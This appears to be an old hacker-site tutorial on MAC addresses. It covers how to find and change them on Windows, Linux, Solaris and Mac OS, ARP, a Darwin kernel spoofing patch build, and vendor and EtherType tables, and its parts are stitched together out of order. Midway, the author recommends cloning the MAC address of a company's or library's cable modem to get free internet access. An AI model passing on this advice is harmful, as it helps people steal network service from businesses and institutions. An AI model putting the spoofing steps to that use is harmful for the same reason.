00A024 3com
00A040 Apple (PCI Mac)
00A04B Sonic Systems Inc. EtherFE 10/100 PCI for Mac or PC
00A073 Com21
00A083 Intel
00A092 Intermate International [LAN printer interfaces]
00A0AE Network Peripherals, Inc.
00A0C8 Adtran, Inc.
00A0C9 Intel (PRO100B and PRO100+) [used on Cisco PIX firewall among others]
00A0CC Lite-On (used by MacSense in Adapter for Mac, also seen in PCs)
00A0D1 National Semiconductor [COMPAQ Docking Station]
00A0D2 Allied Telesyn
00AA00 Intel
00B0D0 Computer Products International
00C000 Lanoptics Ltd
00C001 Diatek Patient Managment
00C002 Sercomm Corporation
00C003 Globalnet Communications
00C004 Japan Business Computer Co.Ltd
00C005 Livingston Enterprises Inc Portmaster (OEMed by Cayman)
00C006 Nippon Avionics Co Ltd
00C007 Pinnacle Data Systems Inc
00C008 Seco SRL
00C009 KT Technology (s) Pte Inc
00C00A Micro Craft
00C00B Norcontrol A.S.
00C00C ARK PC Technology, Inc.
00C00D Advanced Logic Research Inc
00C00E Psitech Inc
00C00F QNX Software Systems Ltd. [also Quantum Software Systems Ltd]
00C011 Interactive Computing Devices
00C012 Netspan Corp
00C013 Netrix
00C014 Telematics Calabasas
00C015 New Media Corp
00C016 Electronic Theatre Controls
00C017 Fluke
00C018 Lanart Corp
00C01A Corometrics Medical Systems
00C01B Socket Communications
00C01C Interlink Communications Ltd.
00C01D Grand Junction Networks, Inc. (Cisco Catalyst also reported)
00C01F S.E.R.C.E.L.
00C020 Arco Electronic, Control Ltd.
00C021 Netexpress
00C023 Tutankhamon Electronics
00C024 Eden Sistemas De Computacao SA
00C025 Dataproducts Corporation
00C027 Cipher Systems, Inc.
00C028 Jasco Corporation
00C029 Kabel Rheydt AG
00C02A Ohkura Electric Co
00C02B Gerloff Gesellschaft Fur
00C02C Centrum Communications, Inc.
00C02D Fuji Photo Film Co., Ltd.
00C02E Netwiz
00C02F Okuma Corp
00C030 Integrated Engineering B. V.
00C031 Design Research Systems, Inc.
00C032 I-Cubed Limited
00C033 Telebit Corporation
00C034 Dale Computer Corporation
00C035 Quintar Company
00C036 Raytech Electronic Corp
00C039 Silicon Systems
00C03B Multiaccess Computing Corp
00C03C Tower Tech S.R.L.
00C03D Wiesemann & Theis Gmbh
00C03E Fa. Gebr. Heller Gmbh
00C03F Stores Automated Systems Inc
00C040 ECCI
00C041 Digital Transmission Systems
00C042 Datalux Corp.
00C043 Stratacom
00C044 Emcom Corporation
00C045 Isolation Systems Inc
00C046 Kemitron Ltd
00C047 Unimicro Systems Inc
00C048 Bay Technical Associates
00C049 US Robotics Total Control (tm) NETServer Card
00C04D Mitec Ltd
00C04E Comtrol Corporation
00C04F Dell
00C050 Toyo Denki Seizo K.K.
00C051 Advanced Integration Research
00C055 Modular Computing Technologies
00C056 Somelec
00C057 Myco Electronics
00C058 Dataexpert Corp
00C059 Nippondenso Corp
00C05B Networks Northwest Inc
00C05C Elonex PLC
00C05D L&N Technologies
00C05E Vari-Lite Inc
00C060 ID Scandinavia A/S
00C061 Solectek Corporation
00C063 Morning Star Technologies Inc May be miswrite of 0003C6
00C064 General Datacomm Ind Inc
00C065 Scope Communications Inc
00C066 Docupoint, Inc.
00C067 United Barcode Industries
00C068 Philp Drake Electronics Ltd
00C069 California Microwave Inc
00C06A Zahner-Elektrik Gmbh & Co KG
00C06B OSI Plus Co
00C06B OSI Plus Corporation
00C06C SVEC Computer Corp
00C06D Boca Research, Inc.
00C06F Komatsu Ltd
00C070 Sectra Secure-Transmission AB
00C071 Areanex Communications, Inc.
00C072 KNX Ltd
00C073 Xedia Corporation
00C074 Toyoda Automatic Loom Works Ltd
00C075 Xante Corporation
00C076 I-Data International A-S
00C077 Daewoo Telecom Ltd
00C078 Computer Systems Engineering
00C079 Fonsys Co Ltd
00C07A Priva BV
00C07B Ascend Communications ISDN bridges/routers
00C07D RISC Developments Ltd
00C07F Nupon Computing Corp
00C080 Netstar Inc
00C081 Metrodata Ltd
00C082 Moore Products Co
00C084 Data Link Corp Ltd
00C085 Canon
00C086 The Lynk Corporation
00C087 UUNET Technologies Inc
00C089 Telindus Distribution
00C08A Lauterbach Datentechnik Gmbh
00C08B RISQ Modular Systems Inc
00C08C Performance Technologies Inc
00C08D Tronix Product Development
00C08E Network Information Technology
00C08F Matsushita Electric Works, Ltd.
00C090 Praim S.R.L.
00C091 Jabil Circuit, Inc.
00C092 Mennen Medical Inc
00C093 Alta Research Corp.
00C095 Znyx (Network Appliance); Jupiter Systems (MX-700); Apple (G3) all seen
00C096 Tamura Corporation
00C097 Archipel SA
00C098 Chuntex Electronic Co., Ltd.
00C09B Reliance Comm/Tec, R-Tec Systems Inc
00C09C TOA Electronic Ltd
00C09D Distributed Systems Int'l, Inc.
00C09F Quanta Computer Inc
00C0A0 Advance Micro Research, Inc.
00C0A1 Tokyo Denshi Sekei Co
00C0A2 Intermedium A/S
00C0A3 Dual Enterprises Corporation
00C0A4 Unigraf OY
00C0A7 SEEL Ltd
00C0A8 GVC Corporation
00C0A9 Barron McCann Ltd
00C0AA Silicon Valley Computer
00C0AB Jupiter Technology Inc
00C0AC Gambit Computer Communications
00C0AD Computer Communication Systems
00C0AE Towercom Co Inc DBA PC House
00C0B0 GCC Technologies,Inc.
00C0B2 Norand Corporation
00C0B3 Comstat Datacomm Corporation
00C0B4 Myson Technology Inc
00C0B5 Corporate Network Systems Inc
00C0B6 Meridian Data Inc
00C0B7 American Power Conversion Corp
00C0B8 Fraser's Hill Ltd.
00C0B9 Funk Software Inc
00C0BA Netvantage
00C0BB Forval Creative Inc
00C0BD Inex Technologies, Inc.
00C0BE Alcatel - Sel
00C0BF Technology Concepts Ltd
00C0C0 Shore Microsystems Inc
00C0C1 Quad/Graphics Inc
00C0C2 Infinite Networks Ltd.
00C0C3 Acuson Computed Sonography
00C0C4 Computer Operational
00C0C5 SID Informatica
00C0C6 Personal Media Corp
00C0C8 Micro Byte Pty Ltd
00C0C9 Bailey Controls Co
00C0CA Alfa, Inc.
00C0CB Control Technology Corporation
00C0CD Comelta S.A.
00C0D0 Ratoc System Inc
00C0D1 Comtree Technology Corporation (EFA also reported)
00C0D2 Syntellect Inc
00C0D4 Axon Networks Inc
00C0D5 Quancom Electronic Gmbh
00C0D6 J1 Systems, Inc.
00C0D9 Quinte Network Confidentiality Equipment Inc
00C0DB IPC Corporation (Pte) Ltd
00C0DC EOS Technologies, Inc.
00C0DE ZComm Inc
00C0DF Kye Systems Corp
00C0E1 Sonic Solutions
00C0E2 Calcomp, Inc.
00C0E3 Ositech Communications Inc
00C0E4 Landis & Gyr Powers Inc
00C0E5 GESPAC S.A.
00C0E6 TXPORT
00C0E7 Fiberdata AB
00C0E8 Plexcom Inc
00C0E9 Oak Solutions Ltd
00C0EA Array Technology Ltd.
00C0EC Dauphin Technology
00C0ED US Army Electronic Proving Ground
00C0EE Kyocera Corporation
00C0EF Abit Corporation
00C0F0 Kingston Technology Corporation
00C0F1 Shinko Electric Co Ltd
00C0F2 Transition Engineering Inc
00C0F3 Network Communications Corp
00C0F4 Interlink System Co., Ltd.
00C0F5 Metacomp Inc
00C0F6 Celan Technology Inc.
00C0F7 Engage Communication, Inc.
00C0F8 About Computing Inc.
00C0FA Canary Communications Inc
00C0FB Advanced Technology Labs
00C0FC ASDG Incorporated
00C0FD Prosum
00C0FF Box Hill Systems Corporation
00DD00 Ungermann-Bass IBM RT
00DD01 Ungermann-Bass
00DD08 Ungermann-Bass
00E011 Uniden Corporation
00E014 Cisco
00E016 rapid-city (now a part of bay networks)
00E018 Asustek Intel 82558-based Integrated Fast Ethernet for WIM
00E01E Cisco
00E029 SMC EtherPower II 10/100
00E02C AST - built into 5166M PC motherboard (win95 id's as Intel)
00E034 Cisco
00E039 Paradyne 7112 T1 DSU/CSU
00E04F Cisco
00E07D Encore (Netronix?) 10/100 PCI Fast ethernet card
00E081 Tyan Computer Corp. Onboard Intel 82558 10/100
00E083 Jato Technologies, Inc.
00E08F Cisco Systems Catalyst 2900 series
00E098 Linksys PCMCIA card
00E0A3 Cisco Systems Catalyst 1924
00E0B0 Cisco Systems Various systems reported
00E0B8 AMD PCNet in a Gateway 2000
00E0C5 BCOM Electronics Inc.
00E0ED New Link
00E0F7 Cisco
00E0F9 Cisco
00E0FE Cisco
020406 BBN internal usage (not registered)
020701 Interlan [now Racal-InterLAN] DEC (UNIBUS or QBUS), Apollo, Cisco
020701 Racal-Datacom
026060 3Com
026086 Satelcom MegaPac (UK)
02608C 3Com IBM PC; Imagen; Valid; Cisco; Macintosh
02A0C9 Intel
02AA3C Olivetti
02CF1F CMC Masscomp; Silicon Graphics; Prime EXL
02E03B Prominet Corporation Gigabit Ethernet Switch
02E6D3 BTI (Bus-Tech, Inc.) IBM Mainframes
048845 Bay Networks token ring line card
080001 Computer Vision
080002 3Com (formerly Bridge)
080003 ACC (Advanced Computer Communications)
080005 Symbolics Symbolics LISP machines
080006 Siemens Nixdorf PC clone
080007 Apple
080008 BBN (Bolt Beranek and Newman, Inc.)
080009 Hewlett-Packard
08000A Nestar Systems
08000B Unisys also Ascom-Timeplex (former Unisys subsidiary)
08000D ICL (International Computers, Ltd.)
08000E NCR/AT&T
08000F SMC (Standard Microsystems Corp.)
080010 AT&T [misrepresentation of 800010?]
080011 Tektronix, Inc.
080014 Excelan BBN Butterfly, Masscomp, Silicon Graphics
080017 National Semiconductor Corp. (used to have Network System Corp., wrong NSC)
08001A Tiara? (used to have Data General)
08001B Data General
08001E Apollo
08001F Sharp
080020 Sun
080022 NBI (Nothing But Initials)
080023 Matsushita Denso
080025 CDC
080026 Norsk Data (Nord)
080027 PCS Computer Systems GmbH
080028 TI Explorer
08002B DEC
08002E Metaphor
08002F Prime Computer Prime 50-Series LHC300
080030 CERN
080032 Tigan
080036 Intergraph CAE stations
080037 Fuji Xerox
080038 Bull
080039 Spider Systems
08003B Torus Systems
08003D cadnetix
08003E Motorola VME bus processor modules
080041 DCA (Digital Comm. Assoc.)
080044 DSI (DAVID Systems, Inc.)
080045 ???? (maybe Xylogics, but they claim not to know this number)
080046 Sony
080047 Sequent
080048 Eurotherm Gauging Systems
080049 Univation
08004C Encore
08004E BICC [3com bought BICC, so may appear on 3com equipment as well]
080051 Experdata
080056 Stanford University
080057 Evans & Sutherland (?)
080058 ??? DECsystem-20
08005A IBM
080066 AGFA printers, phototypesetters etc.
080067 Comdesign
080068 Ridge
080069 Silicon Graphics
08006A ATTst (?)
08006E Excelan
080070 Mitsubishi
080074 Casio
080075 DDE (Danish Data Elektronik A/S)
080077 TSL (now Retix)
080079 Silicon Graphics
08007C Vitalink TransLAN III
080080 XIOS
080081 Crosfield Electronics
080083 Seiko Denshi
080086 Imagen/QMS
080087 Xyplex terminal servers
080088 McDATA Corporation
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
08008E Tandem / Solbourne Computer ?
08008F Chipcom Corp.
080090 Retix, Inc. Bridges
09006A AT&T
10005A IBM
100090 Hewlett-Packard Advisor products
1000D4 DEC
1000E0 Apple A/UX (modified addresses for licensing)
2E2E2E LAA (Locally Administered Address) for Meditech Systems
3C0000 3Com dual function (V.34 modem + Ethernet) card
400003 Net Ware (?)
444553 Microsoft (Windows95 internal "adapters")
444649 DFI (Diamond Flower Industries)
475443 GTC (Not registered!) (This number is a multicast!)
484453 HDS ???
484C00 Network Solutions
4854E8 winbond?
4C424C Information Modes software modified addresses (not registered?)
525400 Realtek (UpTech? also reported)
52544C Novell 2000
5254AB REALTEK (a Realtek 8029 based PCI Card)
565857 Aculab plc audio bridges
800010 AT&T [misrepresented as 080010? One source claims this is correct]
80AD00 CNET Technology Inc. (Probably an error, see instead 0080AD)
AA0000 DEC obsolete
AA0001 DEC obsolete
AA0002 DEC obsolete
AA0003 DEC Global physical address for some DEC machines
AA0004 DEC Local logical address for DECNET systems
C00000 Western Digital (may be reversed 00 00 C0?)
EC1000 Enance Source Co., Ltd. PC clones(?)
E20C0F Kingston Technologies
Well now this Paper is Becoming Much more bigger and bigger and i think this should be enough about MAC Addresses, Changing them and Also Getting Free Internet right ?
This article has been taken from: http://www.arson-network.com/index.php?class=tutorial&subargs=686
Inside Out Of MAC Addresses
Mac Addresses :-
Hey Guys come on lets know what is a MAC address, what are its uses, how it can be used to get free Internet Access. ok Now let me start , Well tell me whats a MAC Address. MAC Address is short for Media Access Control Address. Its the hardware burned address into your network card or cable modem :) It is a hardware address which identifies each terminal of a network. In IEEE 802 networks, the Data Link Control (DLC) layer of the OSI Reference Model is divided into two sublayers:
1) the Logical Link Control (LLC) layer and
2) the Media Access Control (MAC) layer.
The MAC layer interfaces directly with the network media. Consequently, each different type of network media requires a different MAC layer.
On networks that do not conform to the IEEE 802 standards but do conform to the OSI Reference Model, the node address is called the Data Link Control (DLC) address.
MAC Address's are of 48 bits, means they consist of 12 hexadecimal digits (0-9 and A-F). It consists of 12 hexadecimal digits of which the first 6 digits must match the vendor of the Ethernet Card. and the Last 6 digits consits of the serial number of the ethernet vendor.
MAC Address's can be Written in following 3 manners :-
1) 123456789ABC
2) 123456-789ABC
3) 12-34-56-78-9A-BC
These MAC's are Physical Station Addresses, they cannot be called as Multicast or Broadcast Addresses.
Multicast and Broadcast Addresses can be identified easily as the second hex digit is Even and not ODD.
MultiCast Address assignments can be Found at the end of the article.
MAC addresses are assigned by the IEEE, and are used in many widely used network technologies such as :-
1) Ethernet
2) Token ring
3) 802.11 wireless networks
4) ATM (switched virtual connections only, as part of an NSAP address)
MAC addresses are designed to be permanent, but nowadays a lot of people have come out with many technologies to Modify this Hardware Burned Address and they have proved quite sucessful.The MAC address is stored in the Serial EEPROM of the Ethernet card. In addition to holding the MAC address, the EEPROM stores a backup copy of the MAC address and ID information, user configurable parameters, serial numbers for devices, checksums, type of interphase, and other bits of backed up information.
Now Let us try to understand how to identify the MAC address of your machine.
In Windows 98, 98SE (second edition), ME (Millennium)
Start => Run => type winipcfg , the MAC address will show under Ethernet Adapter Information as Adapter Address, but if the address commences with 44. then it is the dialup adapter address not your ethernet address, now drop down and select the correct describtion of your network card.
And On Windows NT4, 2000, XP and 2003
Start => Run => type cmd.exe or goto Start => Programs => for command prompt and click on it and then type ipconfig /all and your MAC address will show under your Ethernet Adapter along side Physical Address.
On linux type this
ifconfig -a (It is located next to hwaddr)
On Linux systems, the ethernet device is typically called eth0. In order to find the MAC address of the ethernet device, you must first become root, through the use of su. Then, type ifconfig -a and look up the relevant info. For example:
# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:60:08:C4:99:AA
inet addr:131.225.84.67 bcast:131.225.87.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:15647904 errors:0 dropped:0 overruns:0
TX packets:69559 errors:0 dropped:0 overruns:0
Interrupt:10 Base address:0x300
The MAC address is the HWaddr listed on the first line. In the case of this machine, it is 00:60:08:C4:99:AA.
On HP-UX
lanscan (It is located under Address without semicolon's)
$ lanscan
Hardware Station Dev Hardware Net-Interface NM Encapsulation Mjr
Path Address lu State NameUnitState ID Methods Num
2.0.2 0x08000935C99D 0 UP lan0 UP 4 ETHER 52
On MAC's
Built-in Ethernet computers using MacTCP
Generally this information is not required in order to set up an AppleTalk network. However, here are four methods to find the built-in Ethernet address:
Note: In order to obtain the Built-In Ethernet hardware address, the card will need to be initialized (hooked up to a valid Ethernet network).
Use MacTCP to identify the Ethernet address by opening MacTCP and using the Option key when selecting the Ethernet icon. For this to work you must be sure the caps lock key is NOT depressed, and connected to an Ethernet network.
If your computer is using Open Transport (OT) 1.1 there is a built-in feature that lets you find the Ethernet hardware address. Follow the steps below: (Your computer has to be on the Ethernet network to do this. If it is not, you cannot perform these steps.)
1. Open the AppleTalk control panel.
2. Go to the Edit menu and select User Mode.
3. Select the Advanced radio button and click OK.
4. Click Info.
5. The hardware address is displayed in the AppleTalk Info window.
You can also use the Apple LAN Utility to report the burned in address without being connected to a network. This article can help you locate the Apple LAN Utility software, "Where To Find Apple Software Updates" -- Lists online services for free Apple software updates.
You can obtain the AG Group EtherPeek network monitoring application, which includes a utility called it GetMyAddress. This utility will also return the address of the computer's internal Ethernet interface.
On Solaris or SunOS
ifconfig -a (The Leading '0' in the hex Digit is not printed)
On Solaris and SunOS systems, the ethernet device is typically called le0 or ie0. In order to find the MAC address of the ethernet device, you must first become root, through the use of su. Then, type ifconfig -a and look up the relevant info. For example:
# ifconfig -a
le0: flags=863 mtu 1500
inet 131.225.80.209 netmask fffff800 broadcast 131.225.87.255
ether 8:0:20:10:d2:ae
Note: Solaris and SunOS strip off the leading 0 commonly included in the MAC address. In the case of this machine, the MAC address is 08:00:20:10:d2:ae
On Free BSD / Open BSD / Net BSD
netstat -i (It is located under Address)
Mac Address is mainly used to identify the device connected to the local network. When one computer connects to another computer on the same network ARP is used , ARP is Short for Address Resolution Protocol is used to map network IP addresses to MAC addresses.
When a computer A wants to commuicate to Computer B on the same network and Computer A knowing Computer B's Ip Address, it first finds out B's MAC adress by checking its own ARP cache. ARP cache holds the Computer A's Subnet's IP Addresses and MAC addresses.
Command to Look at arp cache on both windows and unix Machines is
linux#arp -a
C:\>WINDOWS>arp -a
Again, the IP and MAC addresses of the two pinged addresses were added to the ARP cache. These dynamic entries are only temporary and have a set time to live (TTL) period before they are erased (timeout). The TTL period varies from system to system, usually from 2 to 20 minutes, and will increase to a greater number of minutes if more data from these temporary entries is requested within the allotted TTL period. The TTL period for Windows NT has a default of two minutes, Windows 2000 has a default of 10 minutes, and Solaris has a default of 5 minutes. ARP caches of routers can be much longer which is the case with the Cisco IOS router having a cache time of 4 hours. For some computers, entries
that are static usually remain on the cache table permanently or until the computer is rebooted. The TTL periods can be adjusted on most systems as well.
For security consciousness on networks, it would be best to set your ARP caches on your switches to hold static entries. However, not all that convenient for a LAN administrator, this will prevent ARP spoofing, (an intruder sending spoofed ARP packets to Host A and Host B so that the two hosts will think the intruder’s computer is the intended host/router and send their data traffic through the intruder’s host to allow sniffing and packet manipulation/editing) also called man-in-the-middle attacks, since static ARP tables cannot be updated, hence, making the use of spoofed arp packets useless.
MAC addresses were designed to be fixed numbers that cannot be changed. However, there are some valid reasons to want to change your MAC address.
Changing MAC Addresses to Support Your ISP
Some ISPs, typically cable modem providers, sell Internet subscriptions on a per-address basis. Occasionally the ISP manages these subscriptions by assigning a static (fixed) IP address to the customer. However, this approach is an inefficient use of IP addresses that are currently in short supply.
More typically, ISPs manage single-address subscriptions by registering the MAC address of the device that connects to the ISP. This device could be a broadband modem, for example. The customer is free to build a home or small business network behind this modem, but the ISP expects the MAC address to match the registered value at all times.
Whenever a customer replaces their modem or adds a broadband router, the MAC address will no longer match that registered at the ISP, and the ISP will disable the customer's Internet connection.
Cloning MAC Addresses
One way to solve this problem is to call the ISP and ask them to update the registered MAC address to match the new hardware. A more efficient way to solve this problem is to configure the device so that it advertises the original MAC address, even though it's hardware is built to utilize a different MAC address. This process is called cloning.
Many broadband routers today support MAC address cloning as an advanced configuration option. The exact procedure varies depending on the type of router.
MAC Addresses and Cable Modems
Note that in addition to MAC addresses stored at the ISP, some broadband modems also store the MAC address of the host computer's network adapter. However, in this case, cloning is not required. It's true that changing network adapters ususally causes the cable modem connection to fail. To remedy this problem, though, requires only that the cable modem and computer be reset (and perhaps a waiting period for the ISP to release the old IP address). And this cloning can help users to get free internet access, like you can try and get the mac addresses of the companies's or library's Cable modem and Clone the MAC of their modem and viola you can use internet for free. there are series of steps of changing the MAC on different Cable Modem's which is out of scope of this article, may be some other paper will be written on it when I get a mood on writing such things. But There but its not over this cloneing can be defeated and its good for me to mention it here how it can be done it can be done with the help of digital Signatures from VeriSign, And Each Cable Modem as a Different Digital Signature which cannot be Cloned, and here is a how to from verisign about it :-
How do digital certificates prevent cable modem cloning?
A digital certificate, burned onto the cable modem ROM in the manufacturing process, serves as a unique, unforgeable online credential. It authenticates the identity of each individual cable modem to the cable modem service provider through an exchange of digital keys before permitting the cable modem user to access cable services. This digital "handshake" happens in seconds, hidden from the cable modem user.
Because a private key cannot be extracted from the original cable modem it's part of, a cloned cable modem cannot use the digital certificate and so will be unable to authenticate itself to the cable service provider. Without completing the "handshake" between a cable modem and the service provider, a hacker cannot pirate services.
How does the VeriSign Cable Modem Authentication Service work?
The process begins when the cable manufacturer's designated administrator creates a Media Access Controller (MAC) address file, containing the serial numbers and other identifying information of the cable modems requiring certificates, using the VeriSign-supplied Modem Manufacturing Agent (MMA) application.
The administrator sends the MAC file to VeriSign via the MMA, which can be networked to communicate directly with VeriSign. Or the administrator can use VeriSign's convenient, Web-based Managed PKI Control Center to send the files to VeriSign after obtaining them from the MMA. A special "Registration Authority" (RA) certificate digitally signs and encrypts all communications to and from VeriSign.
The Managed PKI system verifies the authenticity of the MAC file by validating the RA signature, and ensures that MAC addresses or serial numbers have not been used before. VeriSign then generates unique public and private key pairs, using dedicated bulk-generation hardware in our secure data center, and incorporates them along with VeriSign's digital signature, into certificates for every modem serial number in the MAC file.
VeriSign inserts the certificates and their private keys into a certificate batch file, and encrypts it with the MMA public key, keeping a copy of the encrypted file. (Only the MMA can decrypt the batch file, using its private key.)
The administrator is notified by an e-mail linking to a secure Web page to download the batch file of certificates. Certificates can be ordered and downloaded as often as needed - daily or weekly.
Using software provided and customized by VeriSign, the MMA unencrypts the batch file and inserts the certificates and private keys into your manufacturing system as the cable modems are manufactured. Your manufacturing system can then burn the certificates and keys into the modems along with the rest of their program and setup information.
Changing MAC Addresses through the Operating System
Starting with Windows 2000, users can change their MAC address through the Windows My Network Places interface. This feature relies on software support built into the adapter driver program and thus does not work for all adapters.
Likewise, the ifconfig command available in Linux and other flavors of Unix supports changing MAC addresses with the necessary network card and driver support.
Ok now let us see how MAC Address's can be changed on Different Operating Systems.
On Windows 98 and ME it can be Done using this steps :-
Goto Start->Run, type "Winipcfg"
Select your ethernet card and record the MAC address
Goto Start->Run, type "regedit" to bring up registry editor. Make sure you backup your registry in case you screw up. If you screw up important registry entries, you may damage your computer system. Again, MAKE SURE you have a good backup of your registry entry!
Locate "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net". It should have subkeys like "0000", "0001", "0002" and so on.
Click on each subkey that starts with "0000" and determine your Ethernet card by looking at "DriverDesc" key. If it did not match, then goto "0001", "0002" and so on...
Once you got the right NIC card,
Click on dropdown menu Edit->New->String Value.
Name the new string "networkaddress" and click OK.
Double-click on the new "networkaddress" string and you will be prompted for "Value data"
Enter the new MAC address you want to assign. The MAC address you enter should be a 12 digit number with NO "-", i.e. "00C095ECB761"
Here are 2 ways to activate the new MAC address:
If you have regular internal Network Interface Card:
Reboot your system
If you have PCMCIA Card, you can do the following without rebooting (Thanks to Andrew McGlashan for his input):
Open winipcfg
Select card and release the DHCP settings
Close winipcfg
Open "PC Card (PCMCIA)" -in control panel or on the task bar if set
Stop the card
Eject the card
Re-insert the card
Open winipcfg
Select card and renew the DHCP settings
Verify the new MAC address with "WinIPCFG"
On Apple's MAC's :- /* Ripped From http://slagheap.net/etherspoof */
An essential component of penetration testing and network wargames is the ability to specify arbitrary MAC addresses. This ability is also required for the implementation of certain kind of protective security functionality such as proxy ARP, in conjunction with tools such as arpcatch. It's my understanding that ARP spoofing is even being used in some experimental intrusion detection technologies.
Note that this patch is not a tool in and of itself; it merely extends other tools and APIs.
Like other BSD-derived codebases, Mac OS X and Darwin kernels like to meticulously stick the hardware address into the source field of each ethernet header. The following Darwin / Mac OS X kernel patch removes that tendency for AF_UNSPEC packets, allowing injected packets to forge that field in the header.
Also supplied below are a RAW4ALL patch, so you don't always have to be root to use raw sockets, and a FORCE_VERBOSE patch to force verbose output at boot time without having to press Option-V. Note that the FORCE_VERBOSE patch is not necessary with some Apple-supplied tarballs and CVS checkouts.
In recent days, Jeff Nathan has put together a less kludgey patch that fixes all the known issues; this is linked to below. These patches have been tested and verified with up to OS X 10.3 (Darwin 7.0) and verified to allow MAC spoofing with ethernet cards as well as wireless cards.
--------------------------------------------------------------------------------
installation
Building a Darwin kernel is a little different than building one in Open, Free, or NetBSD, so I've included brief directions. If you're a seasoned Darwin user or developer, you likely have all the tools ready to go to build xnu, the source tree for the Darwin kernel. If so, skip ahead to step 5. However, if you've just installed Mac OS X, you likely don't have everything you need to compile kernels, and there are a few steps to go through:
Grab and install the developer tools from Apple's developer site if you haven't already.
make and make install relpath from the bootstrap_cmds project.
make and make install the Libstreams project.
Unpack the cctools project,
make all in the libstuff directory,
make macos_all in the misc directory and install seg_hack.NEW as /usr/local/bin/seg_hack,
make macos in the libmacho directory and install otmp_obj/libmacho_static.a in /usr/local/lib, and
make kld_build in the ld directory and install static_kld/libkld.a in /usr/local/lib.
[Mac OS X 10.3 / Darwin 7.0 only] Build kextsymboltool from the kext_tools project and install in /usr/local/bin. You will need to pull in headers from the IOKitUser project and cctools.
Build the xnu project with the patches of your choice below, the proper options in bsd/conf/MASTER, and the directions in the README supplied by Apple in the xnu tarball. Install your new kernel at /mach_kernel. It goes without saying that you should back up your old one first.
Reboot your box.
I've encountered or heard about a variety of very different compile-time problems, depending on the version of the operating system and the developer tools you're using; if this is the case, try fiddling around with gcc_select.
The directions above, by the way, are intentionally not very thorough. I've tried to write these directions for those who will be able to make use of this patch. In other words, if you can't navigate through the directions above, you probably shouldn't be messing with this patch. Either way, please use it responsibly.
known issues
Jeff Nathan's patch should fix all the known issues with the original ETHERSPOOF patch. Do not use his patch with any of the ETHERSPOOF patches above. They are incompatible, and his patch is better.
The older ETHERSPOOF patches above break the DHCP client thanks to the funky DLILization of the kernel, and though I have yet to see them cause problems getting an address personally, I have received reports and seen the cause of the problem, empty source ethernet address fields in the header.
To Change MAC address on Windows 2000, XP and 2003 :-
This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn’t support Clone MAC address, then you have to go to second method.
Go to Start->Settings->Control Panel and double click on Network and Dial-up Connections.
Right click on the NIC you want to change the MAC address and click on properties.
Under General tab, click on the Configure button
Click on Advanced tab
Under Property section, you should see an item called Network Address or "Locally Administered Address", click on it.
On the right side, under Value, type in the New MAC address you want to assign to your NIC. Usually this value is entered without the - between the MAC address numbers.
Goto command prompt and type in ipconfig /all or net config rdr to verify the changes. If the changes are not materialized, then use the second method.
If successful, reboot your systems.
MAC's On 2000 , XP and 2003 can also be Changed With a Tool named SMAC.
To Change MAC on Windows NT :-
Goto Start->Run, type "cmd" to goto command prompt
Type "ipconfig /all" and record the MAC address for each network adapter
Goto Start->Run, type "regedit" to bring up registry editor. Make sure you backup your registry in case you screw up. If you screw up important registry entries, you may damage your computer system. Again, MAKE SURE you have a good backup of your registry entry!
Locate "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\\Parameters". should have subkeys like "xyz0000", "xyz0001", "xyz0002" and so on.
Click on each subkey that starts with "0000" and determine your Ethernet card by looking at "DriverDesc" key. If it did not match, then goto "0001", "0002" and so on...
Once you got the right NIC card,
Click on dropdown menu Edit->New->String Value.
Name the new string "NetworkAddress" and click OK.
Double-click on the new "NetworkAddress" string and you will be prompted for "Value data"
Enter the new MAC address you want to assign. The MAC address you enter should be a 12 digit number with NO "-", i.e. "00C095ECB761"
Reboot your system
Verify the new MAC address with "IPCONFIG"
TO change MAC's On Unix and Linux can be easily with a tool named macchanger, from :- http://www.alobbs.com/modules.php?op=modload&name=macc&file=index
On Linux Machines to Change MAC Address Type this :-
ifdown eth0 (where eth0 is the ethernet card)
ifconfig hw ether 11:22:AB:C5:9E:6D (<== This is the new MAC Address.)
ifup eth0
and now ifconfig -a and you have changed your mac Addy :)
Ok now here is the List of Codes of Vendor Addresses and Vendor Multicast Addresses :-
Here are the MultiCast Address Vendor Codes :-
ETHER TYPES
(last updated 2001-05-01)
Many of the networks of all classes are Ethernets (10Mb) or
Experimental Ethernets (3Mb). These systems use a message "type"
field in much the same way the ARPANET uses the "link" field.
If you need an Ether Type, contact:
IEEE Registration Authority
c/o Iris Ringel
IEEE Standards Department
445 Hoes Lane, P.O. Box 1331
Piscataway, NJ 08855-1331
Phone +1 732 562 3813
Fax: +1 732 562 1571
Email:
http://standards.ieee.org/db/oui/forms/
The following list of EtherTypes is contributed unverified information
from various sources. Another list of EtherTypes is maitained by
Michael A. Patton and is accessible at:
Assignments:
Ethernet Exp. Ethernet Description References
------------- ------------- ----------- ----------
decimal Hex decimal octal
0000 0000-05DC - - IEEE802.3 Length Field [XEROX]
0257 0101-01FF - - Experimental [XEROX]
0512 0200 512 1000 XEROX PUP (see 0A00) [8,XEROX]
0513 0201 - - PUP Addr Trans (see 0A01)[XEROX]
0400 Nixdorf [XEROX]
1536 0600 1536 3000 XEROX NS IDP [133,XEROX]
0660 DLOG [XEROX]
0661 DLOG [XEROX]
2048 0800 513 1001 Internet IP (IPv4) [IANA]
2049 0801 - - X.75 Internet [XEROX]
2050 0802 - - NBS Internet [XEROX]
2051 0803 - - ECMA Internet [XEROX]
2052 0804 - - Chaosnet [XEROX]
2053 0805 - - X.25 Level 3 [XEROX]
2054 0806 - - ARP [IANA]
2055 0807 - - XNS Compatability [XEROX]
2056 0808 - - Frame Relay ARP [RFC1701]
2076 081C - - Symbolics Private [DCP1]
2184 0888-088A - - Xyplex [XEROX]
2304 0900 - - Ungermann-Bass net debugr[XEROX]
2560 0A00 - - Xerox IEEE802.3 PUP [XEROX]
2561 0A01 - - PUP Addr Trans [XEROX]
2989 0BAD - - Banyan VINES [XEROX]
2990 0BAE - - VINES Loopback [RFC1701]
2991 0BAF - - VINES Echo [RFC1701]
4096 1000 - - Berkeley Trailer nego [XEROX]
4097 1001-100F - - Berkeley Trailer encap/IP[XEROX]
5632 1600 - - Valid Systems [XEROX]
16962 4242 - - PCS Basic Block Protocol [XEROX]
